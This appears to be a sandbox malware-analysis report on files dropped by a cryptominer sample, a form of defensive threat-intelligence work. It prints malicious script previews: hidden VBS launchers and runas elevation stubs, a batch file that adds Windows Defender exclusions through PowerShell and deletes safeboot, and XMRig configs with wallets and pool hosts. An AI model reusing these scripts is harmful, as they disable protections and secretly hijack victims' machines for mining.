Entropy (8bit):	5.165541433085838
Encrypted:	false
SSDEEP:	6:ZDH+7ym/eMTFLmJ/LACCmqMeWLmJ/LA4qnLVapFIuapv1BIapv:s2MTFC/g9M5C/lqnpugHIS
MD5:	746BC6238EFC458BE346EA8D66D4679C
SHA1:	48BE6020E39534030F5776843BD3433F57A7AD0A
SHA-256:	5851AD362D81E896F45CF3DB2A1F925F04F9D9E05DB1BECE823194483884C1EB
SHA-512:	E259705093B19C52464C63831CBFAA6F1ADE851AFC289BA6AE6783EFD8D051216DA038155DF5B8A44D05C9E29D13CB533687DB9B73A79793A1E64A0384A51240
Malicious:	true
Preview:	DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\ProgramData\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\ProgramData\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..

C:\Users\user\AppData\Local\Temp\aapub.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	313
Entropy (8bit):	5.135981028520709
Encrypted:	false
SSDEEP:	6:ZDH+7ym/eMTIaHPZLACCmqMeZaHPZLA4qnLVapFIuapv1BIapv:s2MTLg9MnlqnpugHIS
MD5:	2A13CDEE27030A33CF90E49F26B7B1AD
SHA1:	3BB5A27AD6F24BC81AA01461F3D389CC53DB589C
SHA-256:	8D53EF6F3E4FE49126BB49E112FF18813C7FB6C90E1B059746D979788F6721D2
SHA-512:	68CF4A487900DB356CD84EC3D450F2F9DE6410CD110E18C962538DF93E7D94422E3BE22ABC436EA4696143EDF730E2A6317BF1750B8689C12419AD3B208E80F9
Malicious:	true
Preview:	DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\Public\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\Public\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..

C:\Users\user\AppData\Local\Temp\aatem.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.184871037147829
Encrypted:	false
SSDEEP:	6:ZDH+7ym/eMTI923f+aLACCmqMeZ923f+aLA4qnLVapFIuapv1BIapv:s2MThJg9MdJlqnpugHIS
MD5:	B89E4D1C73C93C1F5EB440DD32D2E9EE
SHA1:	9164AD042146C0EF70B3A59DA92BE1AD2C8F20EB
SHA-256:	C132F398422167FE43AE86CA3CADCE67BE7BD33560FE42C12FFE067960A197D8
SHA-512:	084AD2D043ED93964B397EC6F98268D227586DB758D0E3789D269B6A8B3A46381C01FED6D79BD1D5A76D4545A798148BD5448F671EF1AD87544100DE32F3B32D
Malicious:	true
Preview:	DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\user\AppData\Local\Temp\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\user\AppData\Local\Temp\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..

C:\Users\user\AppData\Local\Temp\cmdow.exe

Download File

Process:	C:\Users\user\Desktop\K4gsPJGEi4.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	6.15492829325332
Encrypted:	false
SSDEEP:	1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
MD5:	DDD12566B99343B96609AFA2524ECEC3
SHA1:	8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
SHA-256:	767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
SHA-512:	B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\config.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	264
Entropy (8bit):	5.579378925177609
Encrypted:	false
SSDEEP:	6:e5odPXvqzm8giMafKn71g7pqfAWFZLabXx1EXYfFROMfoIj:Yo9i6x7ao71g7plWPazAYEMTj
MD5:	B01A9D0151625441C4FC500F2E227439
SHA1:	0F2EC5AC6C9CFE12161512FC237E39335A82BF99
SHA-256:	3EE3ED71F81D848BF7978E0137F475D670EC59596870B0FFE0C6D8FC397B48D0
SHA-512:	A91635B587128EDBBFE1BF65E1AF3E66AA19E422BF00FCF78175756EC82022C61AB12E2AE484C2D1389CFA1CB5915EA3D1DB73242BD7D14E74BD917B49F60D96
Malicious:	false
Preview:	[RandomX]..wallet = 84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T..pool1 = auto.c3pool.org:13333..pool2 = auto.c3pool.org:443..pool3 = xmr.2miners.com:2222..pool4 = xmr.GHhA5Joo.com:2222..noLog = true..

C:\Users\user\AppData\Local\Temp\config.json

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	938
Entropy (8bit):	5.57285235961628
Encrypted:	false
SSDEEP:	24:hDbdmeOM6p75x2iSkel575T96x7J7q7bel57536x7J7q7be9:ZhU1V5xvsP5x6BJ7q7CP536BJ7q7C9
MD5:	73D059C6788D35FBF1CDC6ABD799DF52
SHA1:	A6AF58E1C8EFCACC1A053E6BEA819067ACC0C8C4
SHA-256:	C90CA39AE1993D6171792AE37D19768B887DB22D3912650F7E5FB938537FC77D
SHA-512:	EE6057A92328E756599DFAF998081B88F56EDF486C8ADBB5EA8F7DA8B718693D502314C2260F9B1FDC7196F2033DDE7C30ABF06BAD8AB1F45655DF2599DFC9CD
Malicious:	false
Preview:	{.."autosave": true,.."background": true,.."title": true,.."cpu": true,.."opencl": false,.."cuda": false,.."retries": 1,.."retry-pause": 2,.."pools": [..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:13333",.."user": "8Bg9mc5vUWw8dL8jCxbVda9ukMHxpisqmfCaaUDbngS8jGRS7cuRu1HC6m2dEKZW7yBpDQ3fRQtFShEDXTSbQ9pf5Tk2Sut.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:443",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "xmr.2miners.com:2222",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..}..]..}..

C:\Users\user\AppData\Local\Temp\est1.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	109
Entropy (8bit):	5.052672311769047
Encrypted:	false
SSDEEP:	3:eAub7Kxe4GW9ZsFsGfuOUkh4E2J5xAIXR1WbAFX0y:eAubUeRWIFP923fXIAt0y
MD5:	41EC60ED91E6BE04A431D9DA74F4B5DF
SHA1:	41B0CF3F453E536BF78ED49AAAC08AA1201778A2
SHA-256:	08121F9DE2F0ACAAC4A711E9DD82E044E40FBFA8C05E4144AF16E18D7D61C708
SHA-512:	BAF5B56C75C5FF565A57135763DEFEC914020C2E8994ACF96DE0F480B76939AB877D2F521D177F74EF0A6DC3719EAD73988469F8FA25D3A6B0D7555E22A52B6E
Malicious:	true
Preview:	Type Nul>C:\Windows\System32\V_Test1.txt..del /f /q "C:\Users\user\AppData\Local\Temp\est1.cmd">nul 2>nul..

C:\Users\user\AppData\Local\Temp\est1.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	129
Entropy (8bit):	4.872156751820885
Encrypted:	false
SSDEEP:	3:jNJmFEm86oQ/FERMQsQJM2xAvOUkh4E2J5xAIXR1WJF3ypFCvn:jqNhtCMGz923fXaFCrsn
MD5:	2A8D534AEEEFA91048C18AAA7253F24F
SHA1:	74990FA706B5415FAE4C7B1E56DA433E391A5186
SHA-256:	415A0887C86C263843C5809A0E112F1BDFC189C8AD596C73ADAC3CB51AAA89D5
SHA-512:	C67328A72BD1096777F4B40E12CCFD11B68640CE788561383B59DC45CD9EE9AC30B6F356964E5F1134F05C14F7BB519E52D703207869DB7323D072EC945DC7AC
Malicious:	true
Preview:	Set Shell = CreateObject("Shell.Application")..Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\est1.cmd", , , "runas", 0..

C:\Users\user\AppData\Local\Temp\screen.exe

Download File

Process:	C:\Users\user\Desktop\K4gsPJGEi4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	45568
Entropy (8bit):	7.750275657742685
Encrypted:	false
SSDEEP:	768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
MD5:	A1CD6A64E8F8AD5D4B6C07DC4113C7EC
SHA1:	60E2F48A51C061BBA72A08F34BE781354F87AA49
SHA-256:	B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
SHA-512:	87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

C:\Users\user\AppData\Local\Temp\stwinvr.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2559
Entropy (8bit):	5.059779297812637
Encrypted:	false
SSDEEP:	48:1lNrlNklUldlN5lGIxU+U4bUYPL/GOLEUi4C454LHx7:1/QuHFZ79FS5
MD5:	A47D59A2284C914D39DC42A3CA2A8EEF
SHA1:	D80B2AB17CB86060892094CAB3458B9E2917699F
SHA-256:	5F1D35F50B4DA08E87A19DFDE3D87BD3ED0127844BE6BD9CEF27F43C8A360692
SHA-512:	B85CB7B42CAFB08E36624E03DC7DE7875ABC40B1D1BB644E852EAEA4478FD9C96450CEE4D9169E7DB5A251D0FEF7AB556AD1399647B0EDDA10756317D3C0F8F0
Malicious:	true
Preview:	@echo off..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp">nul 2>nul..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\Tweaker">nul 2>nul..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\en">nul 2>nul..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Public">nul 2>nul..C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\Tfile">nul 2>nul..C:\Win

C:\Users\user\AppData\Local\Temp\stwinvr.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	132
Entropy (8bit):	4.922431686514802
Encrypted:	false
SSDEEP:	3:jNJmFEm86oQ/FERMQsQJM2xAvOUkh4E2J5xAIYTXb93ypFCvn:jqNhtCMGz923fYbxCrsn
MD5:	A05217BAFFA72A155D5D3F4A06FA5342
SHA1:	583111F7035CF9521487DBC1170B95CD9D344558
SHA-256:	E506568CF4EFDBFF7170458BADA70888D29CE577BA02720ABCC5446FCC1D9967
SHA-512:	FF661C24ABADD67C1BB7E4206232692C237194DC2B97859CF192961FE1053A05E6F209C42DE51D500FE22EB82E09C5B2190D83FCDC7204407BAB0159063D7998
Malicious:	true
Preview:	Set Shell = CreateObject("Shell.Application")..Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\stwinvr.cmd", , , "runas", 0..

C:\Users\user\AppData\Local\Temp\tv_x86.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3241944
Entropy (8bit):	6.300666139752175
Encrypted:	false
SSDEEP:	49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
MD5:	A7CDE18F991E97037A7899B7669E2548
SHA1:	0FD0B96FF150A1ECF93206C227A13148933F28CE
SHA-256:	8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
SHA-512:	1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\two.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	116497
Entropy (8bit):	5.696102422334751
Encrypted:	false
SSDEEP:	3072:RK8beoKKntiz73PXOAOZa0jgKX8rYNrah:RK8beoKKntiz73PXI4YNre
MD5:	50278C55AC5F5B3EE360E1120803395A
SHA1:	FDD8749518829BC85DF82CE7FDF6317D8B5B1C1F
SHA-256:	CBC976FE4EFF2EC673DCC23EFECF9AB35FA35F1E98D6CEB284F9A12711874A51
SHA-512:	EC8A744A58CD48012B5EB3EB485DEB6A89F50C6AF1DC62F7E11F5758B7C6A8C45FF41F9EE04239E8C770C8C946FEB11AB808422996AB8D3E1B84C363535F316D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\two.cmd, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\two.cmd, Author: Joe Security
Preview:	@echo off..del /f /q "%Temp%\Test1.txt">nul 2>nul..del /f /q "%Temp%\Test1.txt">nul 2>nul..del /f /q "%WINDIR%\System32\V_Test.txt">nul 2>nul..Title cod2..%WINDIR%\System32\bcdedit.exe /deletevalue safeboot>nul 2>nul..IF EXIST "%temp%\screen.exe" (.."%temp%\screen.exe" win hide ititle "cod2"..)..Copy /v /b /y "%temp%\IntelSvc.exe" "%PROGRAMDATA%\IntelSvc.exe">nul 2>nul..if "%USERNAME%" == "" Goto :DEL_EOF..if "%USERPROFILE%" == "" Goto :DEL_EOF..set "HDD=%USERPROFILE%"..Set HDD=%HDD:Users=&::% "%HDD:Users=&::%"..Set "Public=%HDD%Users\Public"..echo "%temp%" 2>NUL\| %WINDIR%\System32\findstr.exe /i /c:"Local" >nul 2>nul..if "%errorlevel%" == "0" Goto :calMACDINH..Set "PathR=%temp:\=\\%"..Set "Thisrun=%temp%"..echo "%USERPROFILE%" 2>NUL\| %WINDIR%\System32\findstr.exe /i /c:"'" >nul 2>nul..if "%errorlevel%" == "0" Goto :KTDBstar..Goto :BINHTHUONG..:KTDBstar..Set "DBUSER=1"..Set "PathR=%HDD%\Users\\Public\\"..Set "Thisrun=%HDD%Users\Public"..Goto :BINHTHUONG..:calMACDINH..Set "temp1=%USERPR

C:\Windows\SysWOW64\RuntimeBroker.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	392704
Entropy (8bit):	4.965701476357038
Encrypted:	false
SSDEEP:	6144:ZBULviqYnI3QA7JTXRnZSHL2GZbkG/TZgLgscSzNB:9qBlG/TZgUsjzNB
MD5:	AC27DE51896A5BA2FD0DDA9B7955A201
SHA1:	864A95DEF336B50C70300FF6A7C553F0095A535A
SHA-256:	35D3F6C87CC33F2FDA5B594A6990D8D14E085E313564127A9C0606CEDB398F93
SHA-512:	CD25F4BDC8E6DD845F5C836F50259E2E2C291D99B37071F30007FA13EDEB2D8C82880BF9EEFDB363309C9128F78C7E451954B98ABEFA039EA12E33548771D625
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6.Y.W...W...W....1..W....'..W.......W...W..<W.... ..W....0..W....5..W..Rich.W..................PE..L....@.T.....................<......S>............@..........................@..............................................d........`..n...............................................................@...............H............................text............................... ..`.rdata...I.......J..................@..@.data....0... ......................@....rsrc...n....`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\en\Au.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8331776
Entropy (8bit):	6.602098080859404
Encrypted:	false
SSDEEP:	98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
MD5:	A6D4706BAEB9AB97490D745F7A2BB11E
SHA1:	A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
SHA-256:	96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
SHA-512:	5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\SysWOW64\en\Au.avi, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Windows\SysWOW64\en\Au.avi, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\SysWOW64\en\Au.avi, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\SysWOW64\en\Au.avi, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\SysWOW64\en\Au.avi, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`\|..........................idata...F...p...H...B\|.............@....CRT....h.............\|.............@....tls.................\|.............@....rsrc...S............\|.............@....reloc..p............~.............@..B........................................................................................................................................................................

C:\Windows\SysWOW64\en\In.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3241944
Entropy (8bit):	6.300666139752175
Encrypted:	false
SSDEEP:	49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
MD5:	A7CDE18F991E97037A7899B7669E2548
SHA1:	0FD0B96FF150A1ECF93206C227A13148933F28CE
SHA-256:	8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
SHA-512:	1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\en\Ri.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\en\Sy.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1072593
Entropy (8bit):	6.09356912081639
Encrypted:	false
SSDEEP:	12288:R00eV1l1xLc8n0edZLCuKffxOW73ltrAnkUm3FhBhxahwPm6jFWNpfc8AccN4lRw:RDeV1BLci0edZL/OOW7ltCkOvX35F0h7
MD5:	3C47D45F09948B8E6FDB5F96523BC60B
SHA1:	A890EAAE8D5A45D54E7571C4BF780A6EB263586A
SHA-256:	86BB64D0A8D548445E17D4EDEF0A0E5F97D019F3AF524FC9CD625294916C973D
SHA-512:	6B67BB4268595480261FF007058F59AA4505204278B3B094551F14132E9FAF7160019B155831D9AB75D5CAB64C1AC9AD1CEB4A7B6FB5CED87E144E475A74790C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 64%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....R.....+...............L...l................@.................................j......... .........................................................................................................................(............................text...\...........................`.P`.data...d...........................@.`..rdata.............................@.`@/4...........P.......&..............@.0@.bss.....l...p........................`..idata...............<..............@.0..CRT.................L..............@.0..tls.... ............N..............@.0./14..................P..............@.@B/29......L... ...N...R..............@..B/41..........p......................@..B/55.................................@..B/67.................................@.0B/80.....@...........................@..B/91.................................@..B/102....................

C:\Windows\SysWOW64\en\aapub.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	313
Entropy (8bit):	5.135981028520709
Encrypted:	false
SSDEEP:	6:ZDH+7ym/eMTIaHPZLACCmqMeZaHPZLA4qnLVapFIuapv1BIapv:s2MTLg9MnlqnpugHIS
MD5:	2A13CDEE27030A33CF90E49F26B7B1AD
SHA1:	3BB5A27AD6F24BC81AA01461F3D389CC53DB589C
SHA-256:	8D53EF6F3E4FE49126BB49E112FF18813C7FB6C90E1B059746D979788F6721D2
SHA-512:	68CF4A487900DB356CD84EC3D450F2F9DE6410CD110E18C962538DF93E7D94422E3BE22ABC436EA4696143EDF730E2A6317BF1750B8689C12419AD3B208E80F9
Malicious:	false
Preview:	DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\Public\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\Public\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..

C:\Windows\SysWOW64\en\aatem.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.184871037147829
Encrypted:	false
SSDEEP:	6:ZDH+7ym/eMTI923f+aLACCmqMeZ923f+aLA4qnLVapFIuapv1BIapv:s2MThJg9MdJlqnpugHIS
MD5:	B89E4D1C73C93C1F5EB440DD32D2E9EE
SHA1:	9164AD042146C0EF70B3A59DA92BE1AD2C8F20EB
SHA-256:	C132F398422167FE43AE86CA3CADCE67BE7BD33560FE42C12FFE067960A197D8
SHA-512:	084AD2D043ED93964B397EC6F98268D227586DB758D0E3789D269B6A8B3A46381C01FED6D79BD1D5A76D4545A798148BD5448F671EF1AD87544100DE32F3B32D
Malicious:	false
Preview:	DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\user\AppData\Local\Temp\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\user\AppData\Local\Temp\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..

C:\Windows\SysWOW64\en\cm.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	6.15492829325332
Encrypted:	false
SSDEEP:	1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
MD5:	DDD12566B99343B96609AFA2524ECEC3
SHA1:	8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
SHA-256:	767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
SHA-512:	B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\en\co1.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	938
Entropy (8bit):	5.57285235961628
Encrypted:	false
SSDEEP:	24:hDbdmeOM6p75x2iSkel575T96x7J7q7bel57536x7J7q7be9:ZhU1V5xvsP5x6BJ7q7CP536BJ7q7C9
MD5:	73D059C6788D35FBF1CDC6ABD799DF52
SHA1:	A6AF58E1C8EFCACC1A053E6BEA819067ACC0C8C4
SHA-256:	C90CA39AE1993D6171792AE37D19768B887DB22D3912650F7E5FB938537FC77D
